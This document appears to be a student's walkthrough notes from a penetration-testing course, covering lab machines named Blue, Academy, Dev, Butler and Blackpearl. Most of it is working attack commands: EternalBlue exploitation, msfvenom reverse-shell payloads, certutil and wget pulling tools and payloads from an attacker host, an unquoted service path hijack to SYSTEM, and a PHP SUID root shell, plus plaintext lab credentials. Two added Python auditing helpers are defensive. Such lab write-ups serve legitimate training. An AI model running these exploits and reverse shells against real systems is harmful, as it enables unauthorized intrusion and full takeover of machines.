```
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:33:BE:EE (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-07-13T20:57:32
|_  start_date: 2024-07-13T20:49:44
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:33:be:ee (VMware)
|_clock-skew: mean: 1h19m51s, deviation: 2h18m33s, median: -8s
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: WIN-845Q99OO4PP
|   NetBIOS computer name: WIN-845Q99OO4PP\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-13T16:57:32-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.31.132
```
```
[+] 192.168.31.132:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
```
```
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 192.168.31.132
check                                        # Same as the auxiliary/scanner/smb/smb_ms17_010 module
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.131                     # Listening HOST / Kali
run
```
```
cd ~/tcm/peh/blue/AutoBlue-MS17-010/shellcode
./shell_prep.sh
# kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
# y
# LHOST for reverse connection:
# 192.168.31.131
# LPORT you want x64 to listen on:
# 8888
# LPORT you want x86 to listen on:
# 2222
# Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
# 1
# Type 0 to generate a staged payload or 1 to generate a stageless payload
# 0
cd ..
./listener_prep.sh     # Starts a listener
```

```
# Open another terminal
cd ~/tcm/peh/blue/AutoBlue-MS17-010/
python2 eternalblue_exploit7.py 192.168.31.132 shellcode/sc_all.bin
```
```
# exit ftp
cat note.txt
```

Hello Heath! Grimmie has setup the test website for the new academy. I told him not to use the same password everywhere, he will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login. Let me know what you think of this open-source project, it's from 2020 so it should be secure... right ? We can always adapt it to our needs. -jdelta
```
# Kali VM
mkdir ~/tools
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
python3 -m http.server
```

```
# Target reverse shell
cd /tmp
wget http://192.168.31.131:8000/linpeas.sh     # the file will be copied to the target machine
# Run LinPEAS
chmod +x linpeas.sh
./linpeas.sh
```
```
# Kali
ssh grimmie@192.168.31.128
# Paste the My_V3ryS3cur3_P4ss password
grimmie@academy:~$ sudo -l
history
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip

crontab -l             # no crontab for grimmie
crontab -u root -l     # must be privileged
systemctl list-timers
```
➡️ pspy - Monitor linux processes without root permissions
Download pspy64 and move it into the ~/tools directory where the Python HTTP server is running.

```
# Target
cd /tmp
wget http://192.168.31.131:8000/pspy64
chmod +x pspy64
./pspy64     # Wait for backup.sh to run
```
```
cd ~/tcm/peh/dev
ssh -i id_rsa jeanpaul@192.168.31.130
# Enter passphrase for key 'id_rsa':
# Try the password found in the database
# I_love_java
jeanpaul@dev:~$ sudo -l
# /usr/bin/zip can be run with elevated privileges
```
Look for Sudo - If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
```
sudo arp-scan -l     # Butler IP 192.168.31.133
mkdir -p ~/tcm/peh/butler
cd ~/tcm/peh/butler/
```

```
sudo nmap -p- -A -T4 192.168.31.133 -oA butler
```

```
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
7680/tcp  open  pando-pub?
8080/tcp  open  http         Jetty 9.4.41.v20210516
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.41.v20210516)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:06:23:B3 (VMware)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 1909
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:06:23:b3 (VMware)
|_clock-skew: 8h59m49s
| smb2-time:
|   date: 2024-07-14T19:54:50
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms 192.168.31.133
```
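Both scans above (Blue and Butler) report SMB signing as "enabled but not required" or "disabled", which nmap itself labels dangerous. The following added audit helper (not part of the original notes) parses nmap's normal output and lists the hosts on which signing is not enforced, so the finding can be tracked across a whole scan rather than read host by host; the "Nmap scan report" header lines and the third host are assumed, since the page quotes only the script sections.

```python
import re

# Constructed sample in the shape of nmap's normal (.nmap) output. The script
# lines are those from the two scans above; the "Nmap scan report" headers and
# the third host are assumed (they are not quoted on the page).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.31.132
Host script results:
| smb2-security-mode:
|_    Message signing enabled but not required
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
Nmap scan report for butler (192.168.31.133)
| smb2-security-mode:
|_    Message signing enabled but not required
Nmap scan report for 10.0.0.5
| smb2-security-mode:
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:.*?\()?(\d+\.\d+\.\d+\.\d+)\)?")
SMB1_RE = re.compile(r"message_signing:\s*(\w+)")          # smb-security-mode (SMBv1)
SMB2_RE = re.compile(r"Message signing (enabled but not required|enabled and required|disabled)")

def smb_signing_report(nmap_text: str) -> dict[str, dict[str, str]]:
    """Map each scanned host to the SMBv1/SMBv2 signing state nmap reported."""
    report, host = {}, None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:                                   # new host section starts
            host = m.group(1)
            report.setdefault(host, {})
            continue
        if host is None:                        # preamble before the first host
            continue
        if m := SMB1_RE.search(line):
            report[host]["smb1"] = m.group(1).lower()
        if m := SMB2_RE.search(line):
            report[host]["smb2"] = m.group(1).lower()
    return report

def hosts_not_requiring_signing(nmap_text: str) -> list[str]:
    """Hosts on which signing is off or optional: the state nmap labels 'dangerous'."""
    weak = []
    for host, state in smb_signing_report(nmap_text).items():
        if state.get("smb1") == "disabled" or state.get("smb2") in ("disabled", "enabled but not required"):
            weak.append(host)
    return weak
```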
```
# Kali VM
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/download/20240714-cd435bb2/winPEASx64.exe
mv winPEASx64.exe winpeas.exe
python3 -m http.server 80
```

```
# Target reverse shell
cd c:\Users\butler
certutil.exe -urlcache -f http://192.168.31.131/winpeas.exe winpeas.exe     # the file will be copied to the target machine
# Run winPEAS
winpeas.exe
```
Look for useful (red-coloured) information: quick wins for privilege escalation.

Abuse misconfigured services, possible when the path to the service binary is not quoted and contains spaces:

```
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
```
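Why the unquoted path above matters: the service control manager splits an unquoted path at each space and tries every prefix (appending .exe when it has no extension) before reaching the real binary, so each directory along the way must be checked for write access by non-administrators. The helper below is an added example, not part of the original notes or winPEAS; it assumes the ImagePath carries no trailing arguments.

```python
import ntpath

# Constructed sample: the ImagePath winPEAS flagged above (assumption: no arguments follow the path).
WISE_IMAGE_PATH = r"C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe"

def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the service path is not wrapped in quotes and contains a space."""
    p = image_path.strip()
    return not p.startswith('"') and " " in p

def lookup_candidates(image_path: str) -> list[str]:
    """Paths the service control manager would try, in order, before the real binary.

    Windows splits an unquoted path at each space and tries the prefix,
    appending .exe when the prefix has no extension, until one exists.
    Returns [] for quoted paths or paths without spaces (nothing to audit).
    """
    if not is_unquoted_with_spaces(image_path):
        return []
    parts = image_path.strip().split(" ")
    candidates = []
    for i in range(1, len(parts)):          # every prefix except the full path
        prefix = " ".join(parts[:i])
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates

def dirs_to_audit(image_path: str) -> list[str]:
    """Distinct directories where a planted file would be picked up first; check their ACLs."""
    seen = []
    for c in lookup_candidates(image_path):
        d = ntpath.dirname(c)
        if d not in seen:
            seen.append(d)
    return seen
```

For the Wise service this yields C:\ and C:\Program Files (x86)\Wise as the directories whose permissions decide whether the service can be hijacked.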
Drop an exploit binary into the C:\Program Files (x86)\Wise\ directory:

```
# Generate an exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=7777 -f exe > Wise.exe
python3 -m http.server 80
# New terminal
nc -nvlp 7777
```

```
# Target reverse shell
cd C:\Program Files (x86)\Wise\
certutil.exe -urlcache -f http://192.168.31.131/Wise.exe Wise.exe
# Stop the running service
sc stop WiseBootAssistant
sc query WiseBootAssistant
sc start WiseBootAssistant
```
Reverse shell as SYSTEM.
Blackpearl
O.S. - Debian 10
Credentials:
root:tcm
```
sudo arp-scan -l     # Blackpearl IP 192.168.31.129
mkdir -p ~/tcm/peh/blackpearl
cd ~/tcm/peh/blackpearl/
```

```
dnsrecon -r 127.0.0.0/24 -n 192.168.31.129 -d test
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] PTR blackpearl.tcm 127.0.0.1
[+] 1 Records Found
```
This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
```
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"     # This will run /bin/sh as the root user
```